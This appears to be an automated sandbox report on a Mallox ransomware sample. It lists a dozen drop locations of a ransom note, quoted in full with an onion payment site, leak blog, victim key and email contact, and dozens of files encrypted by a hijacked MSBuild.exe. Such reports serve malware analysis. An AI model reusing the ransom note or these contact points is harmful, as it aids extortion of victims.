        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApi\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 8b411caea9d4c7a85768b1a05) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99296443094Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99758941507Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.99244606504Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.66e63cf0-ca83-44b6-857e-f7263160bb37.1.etl entropy: 7.99054933542Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99713319473Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99685778467Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.40e9bdc1-a29d-4b1a-a7d1-bb2a3737a6de.1.etl entropy: 7.99130634143Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99616519033Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99447268798Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\WuProvider.cd10c994-6e5b-4302-9bb7-4110b2d7c98b.1.etl entropy: 7.99243553171Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1239538394\c78f9967-7a8c-44b0-ad94-732b63c89638 entropy: 7.99973919776Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487428721656700_8183D06E-095C-4C4A-A883-18B083FDA30C.log entropy: 7.99066766489Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487468317710800_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log entropy: 7.99750465112Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.log entropy: 7.99614327018Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\WuProvider.cb591e86-a8cb-4b63-8890-fd248482904d.1.etl entropy: 7.99100126603Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf entropy: 7.99719717775Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\Default\NTUSER.DAT.LOG2 entropy: 7.9909381465Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.99746114772Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst entropy: 7.99781797147Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set entropy: 7.99204509198Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json entropy: 7.99430221235Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist entropy: 7.99794475169Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log entropy: 7.9978250503Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons entropy: 7.99373943681Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons entropy: 7.9902596286Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge entropy: 7.99375157953Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.9976349523Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99151489586Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99412569885Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences entropy: 7.99316525387Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor entropy: 7.99534906058Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history entropy: 7.99006749137Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL entropy: 7.99559033802Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data entropy: 7.99643682562Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens entropy: 7.9947262704Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm entropy: 7.99370992765Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal entropy: 7.99722388479Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\uu_host_config entropy: 7.99778468582Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL entropy: 7.99513320156Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens entropy: 7.99591154625Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens entropy: 7.99365749759Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.1.etl entropy: 7.99801214762Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.2.etl entropy: 7.997477962Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.3.etl entropy: 7.99752928933Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.4.etl entropy: 7.99795731026Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.5.etl entropy: 7.99772363387Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.6.etl entropy: 7.99735976142Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1779658456\873489b1-33b2-480a-baa2-641b9e09edcd entropy: 7.99161321144Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1012409649\e8d11bd0-b939-446e-b741-2c68ed471a53 entropy: 7.99945549468Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_965461321\84fb0759-2f62-4b78-b3f8-d06ffbe5ed10 entropy: 7.99664420707Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0824.log entropy: 7.99585193097Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_601093063\2132f61f-f790-4ae6-a355-8cf9a1533800 entropy: 7.99978073746Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_320437163\c50698d5-282c-4c8d-9fa6-c155f2d8d379 entropy: 7.99989458853Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_236606693\9e51170b-7adf-40ab-83b6-5f97b13bedcb entropy: 7.99906973595Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1819848164\1187695d-8276-4e31-8de1-9e57768989bd entropy: 7.9969784403Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1798580215\12ed7c6f-b741-47d7-afa5-30f752dc978b entropy: 7.99791177067Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\jusched.log entropy: 7.99505241389Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\offline entropy: 7.99310577036Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5156_110794397\78549187-a875-4f1e-8dfa-9938ebc29c81 entropy: 7.99615924792Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5652_1417691134\78549187-a875-4f1e-8dfa-9938ebc29c81 entropy: 7.99603436809Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache entropy: 7.9950280555Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.99743567102Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache entropy: 7.99679822601Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_62919943\01d00eb7-ae22-4601-b5b4-6bd76494c105 entropy: 7.99839734239Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache entropy: 7.9973571329Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2[1].css entropy: 7.99265811747Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\oneDs_f2e0f4a029670f10d892[1].js entropy: 7.9957546896Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\2[1] entropy: 7.99783977531Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\PreSignInSettingsConfig[1].json entropy: 7.99701569311Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js entropy: 7.99840663151Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\PreSignInSettingsConfig[1].json entropy: 7.99763112373Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\PreSignInSettingsConfig[1].json entropy: 7.99778556403Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js entropy: 7.99526791178Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\2[1] entropy: 7.99407281993Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\toptraffic[1] entropy: 7.99965508536Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\History.txt entropy: 7.99720516887Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99848602773Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\gu.txt entropy: 7.99060362168Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt entropy: 7.99109286239Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt entropy: 7.99223185608Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt entropy: 7.99087669737Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt entropy: 7.99134746106Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\si.txt entropy: 7.99011738127Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt entropy: 7.99046668566Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak entropy: 7.99969708046Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak entropy: 7.99751655244Jump to dropped file
